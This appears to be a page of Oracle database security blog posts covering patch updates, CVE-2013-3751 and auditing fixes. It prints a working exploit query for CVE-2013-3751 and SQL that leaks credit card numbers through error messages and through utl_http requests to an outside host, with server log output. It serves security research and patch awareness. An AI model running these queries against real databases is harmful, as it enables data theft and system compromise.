Oracle CPU July 2014 + Oracle Exploit CVE-2013-3751

Juli 16th, 2014

Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).

After a short research on the web (google and twitter, less than 5 minutes) I found an exploit for the CVE-2013-3751.

This vulnerability was found by Nicolas Grégoire: He released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1

Timeline of CVE-2013-3751:

  • January 2012: Vulnerability found (fuzzing)
  • February 2012: Vulnerability reported to ZDI
  • March 2012: Vulnerability contracted $500
  • November 2012: Reported to Oracle by ZDI
  • July 2013: Patch published by Oracle
  • March 2014: Oracle’s Cloud still not patched
  • June 2014: Exploit released at INS#14 conference
  • July 2014: Patch for Oracle 12.1 published by Oracle

 

Exploit:

———-

select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a &lt; b]"/>}') like '0wn3d_again';

———-

Best of Oracle Security 2013

November 22nd, 2013

I just uploaded my DOAG 2013 presentation “Best of Oracle Security 2013“.

 

This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…

—————————————————

SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at “ORDSYS.ORDERROR”, line 5
ORA-06512: at “ORDSYS.ORD_DICOM_ADMIN_PRV”, line 1394
ORA-06512: at “ORDSYS.ORD_DICOM_ADMIN_PRV”, line 479
ORA-06512: at “ORDSYS.ORD_DICOM_ADMIN_PRV”, line 8232
ORA-06512: at “ORDSYS.ORD_DICOM”, line 756
ORA-06512: at line 1

 

or

 

select * from credit_card where 1=length(utl_http.request(‘http://192.168.2.102:8080/’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause

 

——– output from access.log ————

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] “GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – –

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] “GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – –

——– output from access.log ————

—————————————————

 

Decrypt Oracle 11.2.0.3 and 12.1.0.1 database link passwords

Oktober 2nd, 2013

At Derbycon 3.0, László Tóth and Ferenc Spala  gave a a new presentation “What’s common in Oracle and Samsung? They tried to think differently… ” (Video). The main focus of the presentation was the Samsung encryption and a new framework called sandy but there was also a small Oracle part.

Laszlo and Ferenc showed how to decrypt Oracle database links in Oracle 11.2.0.3 and Oracle 12.1.0.1 using a small utility called “oradecrlink.py”. In previous versions Oracle used DES to encrypt/decrypt database links. These database link passwords start with “05” (Oracle’s indicator for DES).

 

Fix for oradebug disable auditing available (11.2.0.3/11.2.0.4/12.1.0.1)

September 13th, 2013

2 days ago I gave a presentation “Oracle 12c from the attackers perspective” at the DOAG SIG Security. I learned some interesting things, especially that a fix for the Oracle oradebug “disable auditing” problem is available since 9 months.

Oradebug allows to run OS commands and to enable/disable Oracle SYSDBA and normal auditing on the fly without leaving traces in the audit log. The fix for this problem is available in Oracle 11.2.0.4/12.1.0.1 and was backported to 11.2.0.3 using the patches 15805002, 15808245, 16177780.

By default the setting is not enabled in Oracle 11.2.0.4/12.1..0.1.

The undocumented parameter  _fifteenth_spare_parameter (Oracle Description: fifteenth spare parameter – integer – Yeah, really useful)  can now disable or limit the oradebug functionality. I could not find any information about this parameter on google or my oracle support.

—— extract from the read me.txt of the patch file——————

## _fifteenth_spare_parameter can be set to “all”, “restricted” or “none”
## “all” disables execution of all oradebug commands, “restricted” disables
## execution of restricted oradebug commands, “none” (default) allows execution
## of oradebug commands.

—— extract from the read me.txt ——————

 

 

DOAG 2012: Best of Oracle Security 2012

November 22nd, 2012

Yesterday I gave a presentation “Best of Oracle Security 2012” at the DOAG 2012 conference in Nürnberg.

Best of Oracle Security